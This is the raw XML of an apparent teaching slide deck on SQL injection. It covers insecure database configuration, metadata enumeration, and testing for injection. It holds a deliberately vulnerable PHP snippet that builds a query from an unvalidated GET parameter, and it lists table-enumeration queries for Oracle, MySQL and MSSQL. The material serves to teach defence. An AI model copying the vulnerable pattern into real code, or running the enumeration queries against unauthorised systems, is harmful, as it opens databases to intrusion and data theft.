                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>”]) &lt; $max){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>   // pass the string to an external validator</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>   $bool = validate(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>input_string</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>, $_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>param</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>”]);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>   if ($bool = true) {</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-57150">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>    // continue processing    }   } }}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>// process </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>form 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>if ($_GET[“form”] = “form2”){</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> // no need to validate </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>param</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> as form1 would have validated it for us</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> $SQL = “SELECT ∗ FROM TABLE WHERE ID = $_GET[“</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>param</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>”]”;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> // execute </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> statement</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t> $result = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" err="1"/>
                        <a:t>mysql_query</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>($SQL);</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="400050" lvl="1" indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0"/>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1200"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50838"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Insecure Database Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1143000"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>You can mitigate the damage caused by an SQL injection, in a number of ways. Securing the application code is the first place to start; however, you should not overlook the database itself. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Databases come with a number of default users preinstalled. Some of the better-known (but not the only) ones are:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Microsoft SQL Server uses the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>” database administrator account, </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>MySQL uses the “root” and “anonymous” user accounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Oracle has the accounts SYS, SYSTEM, DBSNMP, OUTLN … often created by default when a database is created. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Some administrators install database servers to execute as the privileged system user account. Server services, especially database servers, should always be run as an unprivileged user to reduce potential damage in the event of a successful attack. However, this is not always possible (e.g., Oracle on Windows).</a:t>
            </a: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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Insecure Database Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1066800"/>
            <a:ext cx="8458200" cy="5334000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Each type of database server also enables, by default, functionality that is often surplus to requirements and can be leveraged by an attacker (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, OPENROWSET, LOAD_FILE, ActiveX, Java support, etc.). </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Application developers often code their applications to connect to a database using one of the built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>privileged accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> instead of creating specific user accounts for their applications needs. These powerful accounts can perform a myriad of actions on the database that are extraneous to an application’s requirement. When an attacker exploits an SQL injection vulnerability in an application that connects to the database with a privileged account, he can execute code on the database with the privileges of that account. Web application developers should work with database administrators to operate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least-privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> model for the application’s database access.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>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563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Insecure Database Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="914400"/>
            <a:ext cx="8686800" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In the event of a successful attack, an attacker needs to know what else is available, what other databases are installed, what other tables are there, and what fields look interesting! This information is available in the database metadata (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>data dictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>).  </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For MySQL Servers (Version 5.0 or later) this data is held in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>INFORMATION_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> virtual database and can be accessed by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>SHOW DATABASES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>SHOW TABLES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>commands. Each MySQL user has the right to access tables within this database, but can see only the rows in the tables that correspond to objects for which the user has the proper access privileges. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>For SQL Server the metadata can be accessed via the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>INFORMATION_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or with system tables (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>syscolumns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>systypes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, etc.), and/or with system stored procedures; SQL Server 2005 introduced some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> views called “sys.∗” and restricts access to objects for which the user has the proper access privileges.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Oracle provides a number of global built-in views for accessing metadata (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>ALL_TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>ALL_TAB_COLUMNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, etc.). These views list attributes and objects that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to the current user. Equivalent views prefixed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>USER_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> show only the objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>owned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> by the current user. Views that are prefixed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>DBA_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> show all objects in the database (require DBA privileges). </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563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Insecure Database Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="990600"/>
            <a:ext cx="8534400" cy="5715000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>-- Oracle statement to enumerate all accessible tables for the current user</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT OWNER, TABLE_NAME FROM ALL_TABLES ORDER BY TABLE_NAME;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>-- MySQL statement to enumerate all accessible tables and databases for the current user</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>-- MSSQL statement to enumerate all accessible tables using the system tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xtype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = ‘U’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>-- MSSQL statement to enumerate all accessible tables using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>catalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> views</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT name FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sys.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>It is not possible to hide or revoke access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>INFORMATION_SCHEMA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>within a MySQL database, and it is not possible to hide or revoke access to the data dictionary within an Oracle database, as it is a view. You can modify the view to restrict access, but Oracle does not recommend this. It is possible to revoke access to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>INFORMATION_SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>sys.∗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> tables within a SQL Server database. This, however, can break some functionality and can cause issues with some applications that interact with the database. The better approach is to operate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>least-privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> model for the application’s database access and to separate privileged roles as appropriate for the functional requirements of the application.</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8438"/>
            <a:ext cx="8229600" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="5300" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="914400"/>
            <a:ext cx="8610600" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>What is SQL injection? It is the vulnerability that results when you give an attacker the ability to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>influence the SQL queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>that an application passes to a back-end database. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>By being able to influence what is passed to the database, the attacker can leverage the syntax and capabilities of SQL, as well as the power and flexibility of supporting database functionality and operating system functionality available to the database. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>SQL injection has probably existed since SQL databases were first connected to Web applications. However, Rain Forest Puppy is widely credited with its discovery—or at least for bringing it to the public’s attention in 1998.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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GB" dirty="0"/>
              <a:t>Identifying SQL Injection Vulnerabilities</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08038"/>
            <a:ext cx="8229600" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" dirty="0"/>
              <a:t>Inferential Testing for Locating SQL Injection Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1600200"/>
            <a:ext cx="8763000" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Because you do not usually have access to the application source code, testing is done by inference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sending requests to the server and detecting anomalies in the response</a:t>
            </a:r>
            <a:r>
